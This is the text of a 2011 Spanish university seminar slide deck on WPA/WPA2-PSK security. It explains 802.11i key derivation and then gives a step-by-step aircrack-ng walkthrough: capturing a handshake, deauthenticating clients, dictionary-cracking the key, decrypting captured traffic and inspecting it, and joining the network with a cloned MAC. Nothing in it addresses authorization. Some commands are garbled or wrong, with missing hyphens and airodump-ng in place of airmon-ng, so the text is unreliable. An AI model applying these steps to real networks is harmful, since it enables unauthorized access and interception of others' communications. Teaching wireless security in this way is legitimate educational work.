Anda di halaman 1dari 18

UNIVERSIDAD NACIONAL PEDRO RUIZ GALLO FACULTAD DE CIENCIAS FISICAS Y MATEMATICAS ESCUELA PROFESIONAL DE INGENIERIA ELECTRONICA

SINTEC 2011
Vulnerabilidad WPA
Ing. Rafael Garca Chinguel
1

Contenido
IEEE 802.11i - WPA REQUISITOS PARA VULNERAR WPA Ejemplo de vulnerar una clave wpa

IEEE 802.11i

Objetivos de 802.11i
Autentificacin AP Cliente: El AP tiene que garantizar que el cliente es quien dice ser Cliente AP: El Cliente tiene que garantizar que el AP es verdadero y no un AP engaoso (man in the middle attack) Privacidad La informacin no es legible por terceros. Integridad La informacin no puede ser alterada en transito.
4

Como trabaja 802.11i


802.11i tiene 3 partes
Supplicant (Solicitante, Cliente) Authenticator (Autenticador, AP) Authentication Server (Servidor de Autenticacin, RADIUS)

Y es hecha por una combinacin de protocolos:


802.1X A Port Based Network Access Control EAP Extensible Authentication Protocol RADIUS Remote Access Dial In User Service
5

Variantes de 802.11i
El proceso de autenticacin puede ser de 2 maneras:
Home Mode: (modo casero, personal)
Pre Shared Key (PSK)

Enterprise Mode: (modo corporativo)


802.1X/EAP

802.11i PSK
Una llave Maestra llamada PMK Pairwise Master Key es creada por un hash entre la Passphrase y el SSID. La PMK es guardada en el Registro de Windows en supplicant.conf en Linux. Otra llave llamada PTK Pairwise Transient Key es creada de manera dinmica despus de un proceso de handshake de 4 vas. PTK es nica a cada sesin.

Privacidad con 802.11i


Privacidad Despus de la autenticacin, los dos lados AP y Cliente tienen la misma PMK Pairwise Master Key que se mantiene durante toda la sesin Para la transmisin de datos, es hecha una derivacin de la PMK y una PTK Pairwise Transient Key nica para cada cliente es utilizada para encriptacin.
8

Integridad con 802.11i


Una parte de la PTK tiene la funcin de proteger los datos para que no sean alterados cuando en transito es el MIC Message Integrity Check (MIC). Con el MIC, para todo paquete el transmisor calcula un hash de los datos con una llave secreta Temporal Integrity Key. MIC = hash(packet, temporal integrity key) WPA usa TKIP Algoritimo de Hashing Michael WPA2 uses CCMP Cipher Block Chaining Message Authentication Check CBCMAC

Cuanto segura es WPA / WPA2 PSK ?


La manera conocida hoy de crackear WPA/PSK es solamente por un ataque de diccionario. Como la llave maestra PMK combina una contrasea con el SSID, escogiendo dos palabras fuertes, hace ineficientes los diccionarios pre-compilados No hay diferencias en la manera y nivel de dificultad para crackear WPA-PSK WPA2-PSK, porque el mecanismo que genera la PMK es el mismo. Solamente cambia el MIC. Herramienta para quiebra de WPA/WPA2 PSK
Cowpatty http://sourceforge.net/projects/cowpatty

La mayor fragilidad de PSK para WISPs es que la llave se encuentra en texto plano en las computadoras de los clientes
10

Cun segura es WPA / WPA2 PSK ?


Cuando el atacante tiene la llave PMK es possible: Ganar acceso no autorizado Falsificar un Punto de acceso y hacer el ataque del hombre del medio (man in the middle)

11

REQUISITOS PARA VULNERAR WPA


Tener diccionarios: *.txt Backtrack 5 en USB DVD Tarjeta inalmbrica

12

EJEMPLO DE VULNERAR UNA CLAVE WPA


13

INICIANDO EL PROCESO CON BACKTRACK


Cambiar orden de booteo (Bootear con DVD O USB):
Start Backtrack in text mode startx (consola grafica) iwconfig (muestra las tarjetas que estn instaladas) User: root y passwd: toor, en algunas distribuciones de backtrack
14

1ER CLI DE BACKTRACK


1- Configurar tarjeta modo monitor
airodump-ng start wlan0

2. Reconocer el entorno inalmbrico


airodump-ng wlan0 t WPA

3. Capturar paquete de datos: Handshake


airodump-ng c canal b mac_AP -w nombre_archivo wlan0

15

2DA CLI DE BACKTRACK


4 . Asociacin falsa usuario cliente: (Tiene que existir un cliente)
aireplay-ng -1 0 a Mac_AP h Mac_Cliente wlan0

5. Ataque 0 (para desauntenticar al cliente)


aireplay-ng -0 10 -a Mac_AP -c Mac _Cliente wlan0

6. Busca la clave:
aircrack-ng w ruta_del_diccionario b mac_ap ruta del hankshake

16

DECODIFICACION Y ANALISIS DE IP Y DNS


7. Decodificar los paquetes:
airdecap-ng p frase clave e ssid ruta completa de archivo.cap

Nota que se genera un nuevo archivo captura-01dec.cap (descifrada) 8. Analizar el trafico capturado:
wireshark ruta del nuevo archivo.dec.cap

Filter: DNS

17

CONECTARSE A LA RED
LO UNICO QUE QUEDA ES CONECTARSE A LA RED BAJO CUALQUIER SISTEMA OPERATIVO SE DEBE TENER EN CUENTA:
CLONAR MAC EL MISMO SEGMENTO DE RED DNS

18

Anda mungkin juga menyukai